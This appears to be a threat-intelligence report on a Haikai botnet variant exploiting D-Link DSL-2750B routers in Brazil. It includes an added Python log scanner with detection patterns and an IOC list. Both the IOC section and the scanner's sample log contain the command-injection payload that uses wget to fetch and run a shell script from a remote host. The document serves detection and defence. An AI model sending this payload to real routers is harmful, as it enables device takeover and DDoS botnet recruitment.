Tempest's monitoring team identified a highly active variant of the Haikai botnet attempting to exploit vulnerabilities in D-Link DSL-2750B routers in Latin America, particularly in Brazil.
This botnet has been detected by our sensors 134 times this month alone and, so far, from 119 different IP addresses.
The infection method is the same one used by other botnets that have been widely reported by Tempest and other researchers. It takes advantage of a remote command execution vulnerability: the attacker downloads a shell script that runs on the device and, depending on the device architecture, fetches the appropriate binary (hakai.mips, hakai.mpls, hakai.x86_x64). The binary is packed with UPX (Ultimate Packer for eXecutables), a well-known open-source packer available on GitHub.
After the infection, the device connects to the attacker’s control panel and receives commands to attack or to attempt to infect other devices.
The control panel closely resembles that of the Gafgyt botnet, whose source code was released years ago and which was also identified as LizardStresser, the botnet used by the Lizard Squad group in its DDoS-as-a-service. This variant is able to launch HTTP, UDP, TCP and STD attacks. In an STD attack, the bot sends packets carrying a random 1024-byte payload.
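The infection request described above (and shown defanged in the IOC section) can be caught in HTTP access logs by looking for shell metacharacters inside the `cli` parameter of `/login.cgi`. The following is an added example written for this note, not code from Tempest; the log lines and the 203.0.113.9 download host are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the report). The second line
# reproduces the request shape from the IOC section with a placeholder host.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Sep/2018:10:01:02 +0000] "GET /login.cgi?cli=admin HTTP/1.1" 200 512
198.51.100.7 - - [12/Sep/2018:10:01:07 +0000] "GET /login.cgi?cli=aa%20aa';wget%20http://203.0.113.9/e%20-O%20->%20/tmp/hk;sh%20/tmp/hk' HTTP/1.1" 200 0
10.0.0.6 - - [12/Sep/2018:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

# Common Log Format: client, method and request path are all we need here.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*"')
# The payload breaks out of the cli= value with a quote and chains commands;
# any shell metacharacter in that parameter is suspicious on this endpoint.
META_RE = re.compile(r"[;'`|&$]")
URL_RE = re.compile(r"""(?:https?|ftp|tftp)://[^\s;'"|&>]+""")

def defang(url: str) -> str:
    """Rewrite a URL so it cannot be fetched or clicked by accident."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def scan_line(line: str):
    """Return a hit dict for a suspicious /login.cgi request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    src, method, path = m.groups()
    path = unquote(path)  # decode %20 etc. before inspecting the parameter
    if not path.startswith("/login.cgi?"):
        return None
    query = path.split("?", 1)[1]
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    cli = params.get("cli", "")
    if not META_RE.search(cli):
        return None
    urls = [defang(u) for u in URL_RE.findall(cli)]
    return {"src": src, "method": method, "cli": cli, "urls": urls}

def scan_log(text: str):
    """Scan a whole log and return every hit, in file order."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["src"], "->", hit["urls"])
```

Extracted download hosts are defanged so they can be pasted into a ticket or blocklist review without being resolved; feed the `urls` field to your own indicator pipeline.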
IOCs
Payload:
GET /login.cgi?cli=aa aa';wget hxxp://46[.]166[.]185[.]42/e -O -> /tmp/hk;sh /tmp/hk'
Payload source:
hxxp://46[.]166[.]185[.]42/e
Hash MD5:
0590e9af54485c9a94ed97ea1b7c022c
e7a32ca82dca999437e5ebb4c76b6760
02baea1994dc58bbfa3bf7944629a6e3
c288f1fa87225e61f0757fb9eaeb237c
Hash SHA256:
8ff5a8e20209267984ca4fe609ae7a8feccabda9114304c1444abc53cb169f5f
3d98fd28c344b067e91881d06942f7532a1f4084d908d882d3975fe0709c85f5
9688a3fdfd8fcb2caa2962623af9cd64c2a74887057900dbca5179aef8c5f319
4072d3b5393d86bf5b6586eec58efe79f3b5b428d183048968ad329fc982aa45
Unique IPs